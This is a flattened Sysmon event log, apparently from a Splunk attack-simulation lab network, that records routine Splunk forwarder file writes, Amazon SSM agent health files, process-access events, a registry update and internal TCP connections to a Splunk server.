Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65740B47CCF9CC968EA2FB9A0BE0797F,SHA256=18FBC1444325F1A85F251AE76D8EDCFD04E462F0379FEA93B01E47B86F3AB1B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103311Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:44.319{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BDBD3916FEEB037523CCA69434BDDED,SHA256=E95311B8EA311175931C3C6EE7B71276F73F0511B31ED267B784A2677CEBB9B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081243Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:44.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=353093AA4F1C50D91BA354DA56893415,SHA256=ED43FD9471F9FAD56290F9D31551966EFAEB04232F05FF5F9886DD2A6C81F48D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103313Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:44.353{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49512-false10.0.1.12-8000- 23542300x8000000000000000103312Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:45.319{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D47160D81B4EB8218CACA2D1E49632,SHA256=365CF7A8AF8069DAD9E61458B9FDCCD252548B429218CAA090E174E39749D469,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081244Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:45.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=359218BCE6BB48B99129BBCCBD46A889,SHA256=CBE6EA706E49624D186ED7812A1D6141984B18FCB263F457D3FFB5B1A6ECB169,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103314Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:46.319{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A569DF6E1C85AE2376084C27AF26D676,SHA256=F546EC88BA17E0058423206EC56158A66482C362499AA5701F3C7815EF78DAA0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000081246Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:49:46.818{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0x66dfafae) 23542300x800000000000000081245Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:46.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1867B405DF2FB9C856399268381B3530,SHA256=858639309D5D821BDAD570A91ECE4594411D58A51D02996F27DFF1B5B73BCF8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103315Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:47.319{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=987D1B53658B1A6C44F20E7821C247A8,SHA256=15A55CC50500BE2BCC3F2AECDFF46FE7C0AAAA3D02A149960B1BBA1BA4636F6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081247Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:47.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9EF3F1A228349456C00836E5B9B155F,SHA256=60E87A4D78BBF63D8EA860EB11FA25292ACF44040779BA72634B1E8E778C3F18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103316Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:48.319{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F138A5D25114F6DC79994767C2473A,SHA256=F2D9C7653E9386C2AEDE76F96F685825909BD720FCCF13C110458AFD9018C128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081248Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:48.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D9BB299A5816F130DE083D83AC23B5,SHA256=A1C5BE8C4E8E5FABF7CE50EC55CDFE2F6896D3E739ADDACC93BB33DE49A828CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103317Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:49.319{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00A05430E168ADE11E1205C41BA86509,SHA256=AFBCA1E742F64EEACDE8A05E08ECB884DF39CB08C5D2796029B8FE6A88079EB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081249Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:49.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A10D2296851C7A458EB9A4D0B694C539,SHA256=815FF7F1C6C56BB804767507DED8E3489AE8CF179E70323A52A07CCF3E95ED01,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103319Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:49.477{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49513-false10.0.1.12-8000- 23542300x8000000000000000103318Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:50.335{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1BB71A7EA6A431E5C4BF1A71B438211,SHA256=8BB69A4590CB8A5F87D6875F219DA4730747FF11E80372BA4A64AFD11CB83538,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081251Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:47.730{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50014-false10.0.1.12-8000- 23542300x800000000000000081250Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:50.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B605CD3C6764F6BFA6C79DFBE32A0F9E,SHA256=EEBBE89AB6E7D84208E1D58169089B057A4C97728A173CF9DB2B25B8319340D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103320Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:51.350{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=359C4EE46D3BB9382DBA4C7051184348,SHA256=23D1AA70131753D357DA06C6B14F3A1A40EBE5A7EE56627D3C56328741A30291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081252Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:51.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=088CF4C20A7377CE467009710113466E,SHA256=907BB0749C315681D2F108E3449C4B98B08AFED569F99298BF94C3707191C365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103321Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:52.366{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45262FB1F5BFC5262199D3A21F9A3DC4,SHA256=B5C49F21A617183BD5580EBA850436DCAECBECF169F008FABCDBF2F3D1ADCC73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081253Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:52.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44E2C6F669F41E0ADE61CE41473C6573,SHA256=F3AE13E9F9C89FE93E27ED877D924B5832DA5ACA83E1B242791B4290F82DB59A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103322Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:53.382{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94F12882F34435CF621891C50FBC7B69,SHA256=2511E5D723E6B7CF3E5E23841703ECCB955F34FAAFA6AFA7C2E09A25F26E3DEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081254Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:53.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62DE761D82145221D4E8B8B78269E944,SHA256=E2473BD4492FEFBEFC214F8B62E8D5E8E51D935D826012D56771CB0057D626BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103323Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:54.382{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C025A99B7E089103A313A1187480606,SHA256=C29C39F274887110CC0134D918315D6C0EF29FD59C6BF5B161866152C473EBC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081255Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:54.021{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D9E8BBFFD51D7F63AA8529378927C9,SHA256=D870E228E716778778AD7CEC0A244F458D83C6B17A287992B84BADDC1F95C454,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103324Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:55.382{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17604ED95AB8628E3F5CCE78407149EE,SHA256=70BCB87634BBE43AAA80EB141ADC28F2211E416D6DBE775726C93508B157FE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081257Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:55.089{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-022MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081256Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:55.023{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE27312FCAE4ABEBB5B2B7FF91785A87,SHA256=807A3346EF7DF29478F241DE94ACE38D8DAFBA84648B7D119A7E12BB430AC62E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103327Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:55.368{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49514-false10.0.1.12-8000- 23542300x8000000000000000103326Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:56.807{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103325Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:56.385{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3724D8163FD63C57FBDF0EF81CA5280E,SHA256=796A397B9A1EF14B1605C3C15FE3D875E3E972548A604939381A13D585AE5B3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081260Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:53.573{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50015-false10.0.1.12-8000- 23542300x800000000000000081259Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:56.088{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-023MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081258Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:56.024{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86A09AAC60C93D34AD943C3C3E6AB7DC,SHA256=F045683A2EDB8889014DBA68C43767234FC5FF083D4060B6A32CBD2CBD5273F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103329Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:57.028{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49515-false10.0.1.12-8089- 23542300x8000000000000000103328Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:57.479{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D8749539B5684A9AE7E373699DD1B9F,SHA256=FBA20D11C7C58EE967A5CED59F620383B563D4420B774493A2D1545CB1D882C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081261Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:57.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BE031328FCE97A751D6AB159F017A87,SHA256=F185C637E7788092F620A3D57CCD6DC569C22C14ACCB2787F4DD265C8AF5D936,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103338Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.651{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B226-615A-C301-00000000FC01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103337Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.651{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103336Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.651{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103335Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.651{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103334Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.651{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103333Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.651{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B226-615A-C301-00000000FC01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103332Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.651{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B226-615A-C301-00000000FC01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103331Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:58.652{58E9C193-B226-615A-C301-00000000FC01}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 